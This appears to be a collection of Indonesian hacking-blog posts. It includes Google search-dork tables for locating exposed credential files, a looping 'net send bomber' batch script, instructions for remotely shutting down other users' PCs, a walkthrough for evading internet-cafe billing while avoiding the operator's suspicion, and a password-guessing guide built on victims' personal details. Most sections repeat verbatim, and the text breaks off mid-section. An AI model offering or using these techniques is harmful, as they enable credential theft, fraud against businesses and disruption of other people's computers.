google sebagai web pencarian no 1 saat ini memang belum ada duanya. teknik pencarian
dengan penggunaan macam tipe dan operator membuat user dapat membuat berbagai
macam variasi pencarian. kita tidak akanmembahas berbagai macam operator tersebut,
karena judul artikel ini mendapatkan password dan username.
semua tabel dalam artikel ini diambil dari buku
“google hacking for penetration testers”, mungkin ada temen2 yang belum sempet baca
jadi saya tulis aja biar semua bisa menikmati. biar temen2 yang masih newbie tidak
terheran heran jika seseorang bisa mendapatkan banyak passworddari website. jadi gak
usah heran….
TABEL KATA KATA KUNCI MENDAPATKAN USERNAMES
———————————————————
KATA KUNCI | KETERANGAN
———————————————————
inurl:admin inurl: |userlist Generic userlist files
———————————————————
inurl:admin filetype: |asp Generic userlist files
inurl:userlist |
———————————————————
inurl:php inurl: |Half-life statistics file, lists username and
hlstats intext: |other information
Server Username |
———————————————————
filetype:ctl |
inurl:haccess. |Microsoft FrontPage equivalent of htaccess
ctl Basic |shows Web user credentials
———————————————————
filetype:reg |
reg intext: |Microsoft Internet Account Manager can
———————————————————
”internet account manager” |reveal usernames and more
filetype:wab wab |Microsoft Outlook Express Mail address
|books
———————————————————
filetype:mdb inurl:profiles |Microsoft Access databases containing
|profiles.
———————————————————
index.of perform.ini |mIRC IRC ini file can list IRC usernames and
|other information
———————————————————
inurl:root.asp?acs=anon |Outlook Mail Web Access directory can be
|used to discover usernames
———————————————————
filetype:conf inurl:proftpd. |PROFTP FTP server configuration file
conf –sample |reveals
|username and server information
———————————————————
filetype:log username putty |PUTTY SSH client logs can reveal
|usernames
|and server information
———————————————————
filetype:rdp rdp |Remote Desktop Connection files reveal user
|credentials
———————————————————
intitle:index.of |UNIX bash shell history reveals commands
.bash_history |typed at a bash command prompt; usernames
|are often typed as argument strings
———————————————————
intitle:index.of |UNIX shell history reveals commands typed at
.sh_history |a shell command prompt; usernames are
|often typed as argument strings
———————————————————
“index of ” lck |Various lock files list the user currently using
|a file
———————————————————
+intext:webalizer +intext: |Webalizer Web statistics page lists Web user-
Total Usernames +intext: |names and statistical information
”Usage Statistics for”
———————————————————
filetype:reg reg HKEY_ |Windows Registry exports can reveal
CURRENT_USER |username usernames and other information
———————————————————
TABEL KATA-KATA KUNCI MENDAPATKAN PASSWORD
———————————————————
KATA KUNCI | KETERANGAN
———————————————————
inurl:/db/main.mdb |ASP-Nuke passwords
———————————————————
filetype:cfm “cfapplication |ColdFusion source with potential passwords
name” password
———————————————————
filetype:pass |dbman credentials
pass intext:userid
———————————————————
allinurl:auth_user_file.txt |DCForum user passwords
———————————————————
eggdrop filetype:user user |Eggdrop IRC user credentials
———————————————————
filetype:ini inurl:flashFXP.ini |FlashFXP FTP credentials
———————————————————
filetype:url +inurl:”ftp://” |FTP bookmarks cleartext passwords
+inurl:”@”
———————————————————
inurl:zebra.conf intext: |GNU Zebra passwords
password -sample -test
-tutorial –download
———————————————————
filetype:htpasswd htpasswd |HTTP htpasswd Web user credentials
———————————————————
intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials
“htgroup” -intitle:”dist”
-apache -htpasswd.c
———————————————————
intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials
htpasswd.bak
———————————————————
“http://*:*@www” bob:bob |HTTP passwords (bob is a sample username)
———————————————————
“sets mode: +k” |IRC channel keys (passwords)
———————————————————
“Your password is * |Remember IRC NickServ registration passwords
this for later use”
———————————————————
signin filetype:url |JavaScript authentication credentials
———————————————————
LeapFTP intitle:”index.of./” |LeapFTP client login credentials
sites.ini modified
———————————————————
inurl:lilo.conf filetype:conf |LILO passwords
password -tatercounter2000
-bootpwd –man
———————————————————
filetype:config config intext: |Microsoft .NET application credentials
appSettings “User ID”
———————————————————
filetype:pwd service |Microsoft FrontPage Service Web passwords
———————————————————
intitle:index.of |Microsoft FrontPage Web credentials
administrators.pwd
———————————————————
“# -FrontPage-” |Microsoft FrontPage Web passwords
inurl:service.pwd
ext:pwd inurl:_vti_pvt inurl: |Microsoft FrontPage Web passwords
(Service | authors | administrators)
———————————————————
inurl:perform filetype:ini |mIRC nickserv credentials
———————————————————
intitle:”index of” intext: |mySQL database credentials
connect.inc
———————————————————
intitle:”index of” intext: |mySQL database credentials
globals.inc
———————————————————
filetype:conf oekakibbs |Oekakibss user passwords
———————————————————
filetype:dat wand.dat |Opera‚ ÄúMagic Wand‚Äù Web credentials
———————————————————
inurl:ospfd.conf intext: |OSPF Daemon Passwords
password -sample -test
-tutorial –download
———————————————————
index.of passlist |Passlist user credentials
———————————————————
inurl:passlist.txt |passlist.txt file user credentials
———————————————————
filetype:dat “password.dat” |password.dat files
———————————————————
inurl:password.log filetype:log |password.log file reveals usernames,
|passwords,and hostnames
———————————————————
filetype:log inurl:”password.log” |password.log files cleartext
|passwords
———————————————————
inurl:people.lst filetype:lst |People.lst generic password file
———————————————————
intitle:index.of config.php |PHP Configuration File database
|credentials
———————————————————
inurl:config.php dbuname dbpass |PHP Configuration File database
|credentials
———————————————————
inurl:nuke filetype:sql |PHP-Nuke credentials
———————————————————
filetype:conf inurl:psybnc.conf |psyBNC IRC user credentials
“USER.PASS=”
———————————————————
filetype:ini ServUDaemon |servU FTP Daemon credentials
———————————————————
filetype:conf slapd.conf |slapd configuration files root password
———————————————————
inurl:”slapd.conf” intext: |slapd LDAP credentials
”credentials” -manpage
-”Manual Page” -man: -sample
———————————————————
inurl:”slapd.conf” intext: |slapd LDAP root password
”rootpw” -manpage
-”Manual Page” -man: -sample
———————————————————
filetype:sql “IDENTIFIED BY” –cvs |SQL passwords
———————————————————
filetype:sql password |SQL passwords
———————————————————
filetype:ini wcx_ftp |Total Commander FTP passwords
———————————————————
filetype:netrc password |UNIX .netrc user credentials
———————————————————
index.of.etc |UNIX /etc directories contain
|various credential files
———————————————————
intitle:”Index of..etc” passwd |UNIX /etc/passwd user credentials
———————————————————
intitle:index.of passwd |UNIX /etc/passwd user credentials
passwd.bak
———————————————————
intitle:”Index of” pwd.db |UNIX /etc/pwd.db credentials
———————————————————
intitle:Index.of etc shadow |UNIX /etc/shadow user credentials
———————————————————
intitle:index.of master.passwd |UNIX master.passwd user credentials
———————————————————
intitle:”Index of” spwd.db |UNIX spwd.db credentials
passwd -pam.conf
———————————————————
filetype:bak inurl:”htaccess| |UNIX various password file backups
passwd|shadow|htusers
———————————————————
filetype:inc dbconn |Various database credentials
———————————————————
filetype:inc intext:mysql_ |Various database credentials, server names
connect
———————————————————
filetype:properties inurl:db |Various database credentials, server names
intext:password
———————————————————
inurl:vtund.conf intext:pass –cvs |Virtual Tunnel Daemon passwords
———————————————————
inurl:”wvdial.conf” intext: |wdial dialup user credentials
”password”
———————————————————
filetype:mdb wwforum |Web Wiz Forums Web credentials
———————————————————
“AutoCreate=TRUE password=*” |Website Access Analyzer user passwords
———————————————————
filetype:pwl pwl |Windows Password List user credentials
———————————————————
filetype:reg reg +intext: |Windows Registry Keys containing user
”defaultusername” intext: |credentials
”defaultpassword”
———————————————————
filetype:reg reg +intext: |Windows Registry Keys containing user
”internet account manager” |credentials
———————————————————
“index of/” “ws_ftp.ini” |WS_FTP FTP credentials
“parent directory”
———————————————————
filetype:ini ws_ftp pwd |WS_FTP FTP user credentials
———————————————————
inurl:/wwwboard |wwwboard user credentials
———————————————————
mungkin temen2 ada yang ingin melihat password dari website jerman?
mungkin sebaiknya kita juga mengganti kata “password” dengan memakai bahasa jerman
tentunya dibawah ini adalah tabel 5 negara beserta terjemahan password dalam bahasa
masing2 negara.
—————————————————–
BAHASA |KATA-KATA| TRANSLATE
—————————————————–
German |password | Kennwort
Spanish |password | contraseña
French |password | mot de passe
Italian |password | parola d’accesso
Portuguese |password | senha
Dutch |password | Paswoord
—————————————————–
setelah temen2 banyak mendapatkan password, apa yang akan anda lakukan?jangan
berbuat jahat yang pasti, lihat2 saja isinya atau anda terlalu baik dengan memberitahu
admin. jangan lupa sediakan john the ripper dirumah, sapa tau password yang disimpan
sudah dalam keadaan terenkripsi.
keterangan :
karena ketidak teraturan kata2 pada artikel ini, setelah tanda “|” berarti itu merupakan
keterangan dari kata kunci. MOHON MAAF
Jumat, 06 Maret 2009
NET SEND BOMBER
NET SEND BOMBER
Sebelumnya mohon maaf jika ada kata2 yg kurang berkenan (terutama untuk mas2 senior
yg ada di balihack), penulis hanya ingin sharing sedikit ilmu untuk net send
bomber(hanya bisa untuk intranet) dengan menggunakan batch programing.
Baiklah kita mulai dengan script kecil dibawah ini ,
————————————————————————–
@echo IP target : %1
@echo Net Send Bomber siap melakukan serangan …
@pause
:serang
@net send %1 Hooiiiii %1 Jomblo_Keparat was here !!!!!!
@goto serang
————————————————————————–
simpan dengan nama serang.bat , terus cara menggunakannya di cmd DOS prompt ketik :
serang [IP_TARGET]/[nama_komputer_target].
Contoh : serang 192.168.100.1
serang pc_target
serang * (bom ke semua PC yg ada di network)
untuk mengetahui IP target/nama komputer gunakan net view terlebih dahulu.
OK.terima kasih
Sebelumnya mohon maaf jika ada kata2 yg kurang berkenan (terutama untuk mas2 senior
yg ada di balihack), penulis hanya ingin sharing sedikit ilmu untuk net send
bomber(hanya bisa untuk intranet) dengan menggunakan batch programing.
Baiklah kita mulai dengan script kecil dibawah ini ,
————————————————————————–
@echo IP target : %1
@echo Net Send Bomber siap melakukan serangan …
@pause
:serang
@net send %1 Hooiiiii %1 Jomblo_Keparat was here !!!!!!
@goto serang
————————————————————————–
simpan dengan nama serang.bat , terus cara menggunakannya di cmd DOS prompt ketik :
serang [IP_TARGET]/[nama_komputer_target].
Contoh : serang 192.168.100.1
serang pc_target
serang * (bom ke semua PC yg ada di network)
untuk mengetahui IP target/nama komputer gunakan net view terlebih dahulu.
OK.terima kasih
Mengisengi warga dalam local area network
Mengisengi adalah sebuah pekerjaan yang mudah menurut saya walaupun terkadang
membuat orang kesal dengan perbuatan kita yah apa boleh buat kalau sudah iseng kita
suka terlanjur masuk dan bersenang-senang di sini saya masukan artikel bagaimana
menjahili orang dengan mematikan komputernya dengan tiba-tiba menggunakan comand
prompt GBU
Mengerjai sang Penyusup (Shutdown)
Menjadi penyusup memang menyenangkan. Tapi segalanya akan jadi menjengkelkan
tatkala kita dalam posisi korban/sang admin. Ini hanya salah satu alternatif untuk
menjahili sang penyusup. Kita akan mematikan komputernya jarak jauh Tak perlu
repot-repot menggunakan program remote kesayangan anda, gunakan saja bawaan
windows. Mengenai bagaimana cara mendeteksi sang penyusup, baca artikel
terdahulu.
1. Buka Windows Command Processor anda. Klik Start -> Run lalu ketik: cmd
2. Pada command prompt, ketik: shutdown -i lalu tekan Enter.
3. Perintah tersebut akan memanggil kotak dialog Remote Shutdown. Perhatikan
screenshoot berikut:
4. Klik tombol Add untuk memasukkan IP Address atau nama komputer target.
Anda bisa memilih aksi, Shutdown, Log Off atau Restart. Pada kolom Display
warning for anda bisa menentukan berapa lama countdown yang kan
ditampilkan sebelum komputer di shutdown/log off/restart. Pada Opsi planned,
ada pesan otomatis yang bisa anda pilih. Pada kolom Comment, anda bisa
menuliskan pesan anda untuk sang penyusup. Entah ledekan atau.. terserah anda
laah.. Saya rasa anda lebih jago soal ledek-meledek hehehe…
5. Klik OK sesudahnya. Kira-kira di komputer target akan muncul seperti ini :
Hohoho… menyenangkan bukan?? Eh?? Kenapa?? Oh, anda adalah sang penyusup??
tidak ingin komputer yang anda pakai dimatikan dengan cara seperti diatas?? Tenang,
saya ada sedikit tips..
1. Saat anda melihat kotak dialog peringatan bahwa komputer anda akn segera di
shutdown, secepat mungkin bukalah Notepad atau aplikasi Microsoft Word.
Ketik kata-kata sakti berikut: AKU INGIN HIDUP 1000 TAHUN LAGI!!
Hehehe.. kelamaan yach?? emang harus kata-kata itu?? Ya nggak laah.. ketik
apa aja dech, terserah anda, yang penting jangan biarkan kosong. Jangan
menekan tombol Save!!
2. Saat “waktu eksekusi” menunjukkan angka 00:00:00, windows akan berusaha
menutup aplikasi-aplikasi yang masih terbuka. Nah, aplikasi
Notepad/Microsoft word yang anda buka tadi akan meminta konfirmasi dari
anda apakah anda ingin menyimpan dokumen anda. Jangan pilih apa-apa,
biarkan saja kotak dialog tu bertanya-tanya ;p
3. Beberapa saat kemudian akan muncul kotak dialog End Program, klik tanda
silang yang berada pada pojok kanan atas atau pilih cancel. Kotak dialog yang
muncul berbeda-beda, kurang lebih demikian:
Nah, anda akan mendapati komputer anda tetap hidup, sehat walafiat dan berdiri tegak.
hehehe…
Cuma itu caranya?? Ada nich yang lebih “formal” ^_^
1. Klik START -> Run
2. Secepat kilat, ketik shutdown -a
Perintah itu adalah perintah untuk melakukan Abort terhadap shutdown.
Lalu apa yang akan dilakukan sang Admin?? Tentu kondisi ini tidak bisa didiamkan.
Jangan biarkan sang Penyusup senyum-senyum sendiri. Andalah sebagai admin yang
harus tersenyum Beri serangan kedua!! Jangan dulu pakai software remot favorit
anda, nggak perlu ngeluarin senjata pamungkas untuk penyusup seperti ini. Ulangi
langkah awal tadi, shutdown -i, namun jangan beri centang pada opsi Warn Users Of
the action dan kosongi juga opsi Planned. Jangan beri pesan apa-apa dan komputer
sang penyusup akan langsung shutdown tanpa konfirmasi
Sekian… and Happy SHUTTING DOWN!!! ^_^
Mengisengi adalah sebuah pekerjaan yang mudah menurut saya walaupun terkadang
membuat orang kesal dengan perbuatan kita yah apa boleh buat kalau sudah iseng kita
suka terlanjur masuk dan bersenang-senang di sini saya masukan artikel bagaimana
menjahili orang dengan mematikan komputernya dengan tiba-tiba menggunakan comand
prompt GBU
Mengerjai sang Penyusup (Shutdown)
Menjadi penyusup memang menyenangkan. Tapi segalanya akan jadi menjengkelkan
tatkala kita dalam posisi korban/sang admin. Ini hanya salah satu alternatif untuk
menjahili sang penyusup. Kita akan mematikan komputernya jarak jauh Tak perlu
repot-repot menggunakan program remote kesayangan anda, gunakan saja bawaan
windows. Mengenai bagaimana cara mendeteksi sang penyusup, baca artikel
terdahulu.
1. Buka Windows Command Processor anda. Klik Start -> Run lalu ketik: cmd
2. Pada command prompt, ketik: shutdown -i lalu tekan Enter.
3. Perintah tersebut akan memanggil kotak dialog Remote Shutdown. Perhatikan
screenshoot berikut:
4. Klik tombol Add untuk memasukkan IP Address atau nama komputer target.
Anda bisa memilih aksi, Shutdown, Log Off atau Restart. Pada kolom Display
warning for anda bisa menentukan berapa lama countdown yang kan
ditampilkan sebelum komputer di shutdown/log off/restart. Pada Opsi planned,
ada pesan otomatis yang bisa anda pilih. Pada kolom Comment, anda bisa
menuliskan pesan anda untuk sang penyusup. Entah ledekan atau.. terserah anda
laah.. Saya rasa anda lebih jago soal ledek-meledek hehehe…
5. Klik OK sesudahnya. Kira-kira di komputer target akan muncul seperti ini :
Hohoho… menyenangkan bukan?? Eh?? Kenapa?? Oh, anda adalah sang penyusup??
tidak ingin komputer yang anda pakai dimatikan dengan cara seperti diatas?? Tenang,
saya ada sedikit tips..
1. Saat anda melihat kotak dialog peringatan bahwa komputer anda akn segera di
shutdown, secepat mungkin bukalah Notepad atau aplikasi Microsoft Word.
Ketik kata-kata sakti berikut: AKU INGIN HIDUP 1000 TAHUN LAGI!!
Hehehe.. kelamaan yach?? emang harus kata-kata itu?? Ya nggak laah.. ketik
apa aja dech, terserah anda, yang penting jangan biarkan kosong. Jangan
menekan tombol Save!!
2. Saat “waktu eksekusi” menunjukkan angka 00:00:00, windows akan berusaha
menutup aplikasi-aplikasi yang masih terbuka. Nah, aplikasi
Notepad/Microsoft word yang anda buka tadi akan meminta konfirmasi dari
anda apakah anda ingin menyimpan dokumen anda. Jangan pilih apa-apa,
biarkan saja kotak dialog tu bertanya-tanya ;p
3. Beberapa saat kemudian akan muncul kotak dialog End Program, klik tanda
silang yang berada pada pojok kanan atas atau pilih cancel. Kotak dialog yang
muncul berbeda-beda, kurang lebih demikian:
Nah, anda akan mendapati komputer anda tetap hidup, sehat walafiat dan berdiri tegak.
hehehe…
Cuma itu caranya?? Ada nich yang lebih “formal” ^_^
1. Klik START -> Run
2. Secepat kilat, ketik shutdown -a
Perintah itu adalah perintah untuk melakukan Abort terhadap shutdown.
Lalu apa yang akan dilakukan sang Admin?? Tentu kondisi ini tidak bisa didiamkan.
Jangan biarkan sang Penyusup senyum-senyum sendiri. Andalah sebagai admin yang
harus tersenyum Beri serangan kedua!! Jangan dulu pakai software remot favorit
anda, nggak perlu ngeluarin senjata pamungkas untuk penyusup seperti ini. Ulangi
langkah awal tadi, shutdown -i, namun jangan beri centang pada opsi Warn Users Of
the action dan kosongi juga opsi Planned. Jangan beri pesan apa-apa dan komputer
sang penyusup akan langsung shutdown tanpa konfirmasi
Sekian… and Happy SHUTTING DOWN!!! ^_^
DAFTAR SITUS-SITUS HACKING
DAFTAR SITUS-SITUS HACKING
Indonesia
Jambihacker http://www.jambihackerlink.tk
Jasakom http://www.jasakom.com
Bosen http://www.bosen.net (udah gak aktif)
balihacker http://www.balihackerlink
bali http://balihacker.hp.ms
solo http://solohackerlink.web.id
Echo http://www.echo.or.id
Hitam-putih http://www.hitam-putih.org (dah gak aktif)
Yogya http://www.yogyafree.net (bisa di goggling)
bali(2) http://balihack.or.id
malang http://malanghack.net
- Luar Negeri
PacketStorm http://www.packetstormsecurity.org
Phrack Magz http://www.phrack.org
Securiteamhttp://www.securiteam.com
SecurityFocus http://www.securityfocus.com
SecurityReason http://www.securityreason.com
HackThis Site http://www.hackthissite.com
Indonesia
Jambihacker http://www.jambihackerlink.tk
Jasakom http://www.jasakom.com
Bosen http://www.bosen.net (udah gak aktif)
balihacker http://www.balihackerlink
bali http://balihacker.hp.ms
solo http://solohackerlink.web.id
Echo http://www.echo.or.id
Hitam-putih http://www.hitam-putih.org (dah gak aktif)
Yogya http://www.yogyafree.net (bisa di goggling)
bali(2) http://balihack.or.id
malang http://malanghack.net
- Luar Negeri
PacketStorm http://www.packetstormsecurity.org
Phrack Magz http://www.phrack.org
Securiteamhttp://www.securiteam.com
SecurityFocus http://www.securityfocus.com
SecurityReason http://www.securityreason.com
HackThis Site http://www.hackthissite.com
CARA HACKER WARNET
CARA HACKER WARNET
Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing
warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang
bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing
lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!
Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca,
kecuali pengen mati kebosanan (niru kata-kata siapa ya?:)
Ini dia caranya…
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows
dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi
Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login
melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya
terhalang oleh screen login yang menyebalkan itu. Naah… udah tau apa yang bakal saya
jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan
Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu
tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider.
Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen
silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan
harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login
screen sialan itu.
Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe
setengah isi disket.
Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat
Langkah-langkahnya:
01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga
dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa
nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja
pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z..
Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau
ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih
ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang
menghilang entah kemana:)
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke
angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.
Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila
si op sering keluyuran.
Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file
readme yang disertakan bersama zhider
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga
menutup zhider.
Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan
jahatmu tidak diridhai Tuhan
Kalo ketahuan langsung pertebal “muka bego”-mu. Misalnya bilang “Eh, kok jadi gini
ya? Kemaren ga gini kok.” Ato kata-kata lain, tergantung kreatifitas anda. /no1
by Bekhaz Corp
Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing
warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang
bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing
lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!
Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca,
kecuali pengen mati kebosanan (niru kata-kata siapa ya?:)
Ini dia caranya…
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows
dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi
Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login
melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya
terhalang oleh screen login yang menyebalkan itu. Naah… udah tau apa yang bakal saya
jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan
Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu
tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider.
Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen
silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan
harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login
screen sialan itu.
Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe
setengah isi disket.
Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat
Langkah-langkahnya:
01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga
dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa
nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja
pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z..
Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau
ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih
ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang
menghilang entah kemana:)
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke
angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.
Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila
si op sering keluyuran.
Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file
readme yang disertakan bersama zhider
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga
menutup zhider.
Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan
jahatmu tidak diridhai Tuhan
Kalo ketahuan langsung pertebal “muka bego”-mu. Misalnya bilang “Eh, kok jadi gini
ya? Kemaren ga gini kok.” Ato kata-kata lain, tergantung kreatifitas anda. /no1
by Bekhaz Corp
SENI MENEBAK PASSWORD
SENI MENEBAK PASSWORD
Kita akan membahas teknik Blind Guessing. Teknik ini merupakan dasar dari
DictionaryAttack yaitu kita mencoba menebak kemungkinan terbesar dari password.
Setelah kita berhasil menyusun kemungkinan tebakan password, kita bisa menggunakan
Brute Force Tool seperti Brutus. Para user yg cerdik akan menggunakan password yg
sangat sulit ditebak. Bahkan menggunakan kombinasi yg sangat panjang termasuk
didalamnya karakter alfanumerik maupun karakter khusus..
Sebagai pertimbangan, gunakan rumus berikut untuk mendapatkan jumlah kemungkinan
kombinasi password yg mungkin :
Z=X^Y
untuk :
X = jumlah karakter kombinasi
Y = jumlah karakter password
Z = jumlah kombinasi karakter password
^ = tanda pangkat
Contoh :
Karakter kombinasi adalah “hanya” angka yaitu : (1,2,3,4,5,6,7,8,9,0). Jadi jumlah
karakter = 10
Misalnya password yg digunakan hanya 2 karakter (37) maka jumlah karakter password
= 2
Maka jumlah kombinasi password yg mungkin terjadi adalah 10^2 = 100
Bisa anda bayangkan jika password berupa kombinasi karakter alfanumerik dan karakter
khusus selain panjangnya password, akan banyak sekali kombinasinya. Namun disitulah
tatangannya. Sebelum melakukan Blind Guessing, pastikan anda telah mendapatkan
informasi tentang korban, misalnya nama, nama org tua, tanggal lahir, nama kekasih dan
lainnya. Dapatkan sebanyak mungkin, hal ini akan sangat membantu.
1. Kombinasi Umum
Beberapa user yg malas suka menggunakan kombinasi yg mudah diingat dan sederhana,
contoh :
1234567890
0987654321
zxcvbnm
mnbvcxz
asdfghjkl
lkjhgfdsa
qwertyuiop
poiuytrewq
Saya rasa tidak sulit utk menemukan cara mengetiknya.
2. Kombinasi ala Hacker
Hacker suka sekali menggunakan angka menggantikan huruf, contoh : h4ck3r, 70mi,
m0b1 dan lainnya. Kemungkinan kombinasi tergantung menurut nama dan beberapa
kriteria lain seperti nama kekasih, hobi, nama situs/layanan yg digunakan dan lainnya.
contoh :
Nama korban : Master Hacker
Kemungkinan : m4st3r_h4ck3r, m4st3r, h4ck3r
3. Berhubungan dgn nama
Nama : John Doe
Kemungkinan : doe, jdoe, johndoe, jd
4. Berhubungan dgn handle
Nama : John Doe
Handle : tikus
Kemungkinan : jdtikus, tikusdoe, tikusjohn, tikus, rat, doetikus
5. Berhubungan dgn nama kekasih/teman
Nama : John Doe
Kekasih/teman : Fitri
Kemungkinan : johnlovefitri, fitriloveyou, jdf, johnfitri
6. Berhubungan dgn nomor telepon
Nama : John Doe
No.Telepon : 12345
Kemungkinan : jd12345, john12345, doe54321
7. Berhubungan dgn layanan/service yg digunakan
Nama : John Doe
Service : email
Kemungkinan : johnemail, jdemail, doemail, mymail, myemail
Bisa kita lihat dari kombinasi diatas yg sebenarnya masih sangat banyak sekali
kemungkinan yg terjadi. Namun beberapa yg cukup akurat adalah kombinasi umum dan
kombinasi ala hacker. Sengaja saya sebut kombinasi umum karena dalam banyak review
dgn rekan2 dan beberapa kenalan ternyata kombinasi (zxcvbnm) sangat dikenal. Tidak
lah begitu sulit utk menghafalnya dan pada dasarnya memang tidak perlu dihafalkan
karena memiliki susunan yg unik. Sebagian besar cenderung menggunakan hal2 yg
sederhana.
Kombinasi ala hacker juga sering saya jumpai. Dengan teknik sosial dan akses fisik, saya
sering menemukan password dgn kombinasi seperti ini. Penggunaan kombinasi ini sangat
sederhana dan mudah diingat.
Kombinasi ini sangat berhubungan dgn nama atau handle. Kembali kepada anda, sejauh
mana kreatifitas anda, sebanyak apa informasi yg berhasil anda dapatkan akan sangat
membantu akurasi penebakan password. Sebagai pengguna layanan dgn otentikasi yg
membutuhkan password. Kita tidak pernah lepas dari masalah memilih password yg baik.
Password yg baik hendaknya sulit ditebak, tidak berhubungan dgn diri kita atau org
terdekat.
Kita akan membahas teknik Blind Guessing. Teknik ini merupakan dasar dari
DictionaryAttack yaitu kita mencoba menebak kemungkinan terbesar dari password.
Setelah kita berhasil menyusun kemungkinan tebakan password, kita bisa menggunakan
Brute Force Tool seperti Brutus. Para user yg cerdik akan menggunakan password yg
sangat sulit ditebak. Bahkan menggunakan kombinasi yg sangat panjang termasuk
didalamnya karakter alfanumerik maupun karakter khusus..
Sebagai pertimbangan, gunakan rumus berikut untuk mendapatkan jumlah kemungkinan
kombinasi password yg mungkin :
Z=X^Y
untuk :
X = jumlah karakter kombinasi
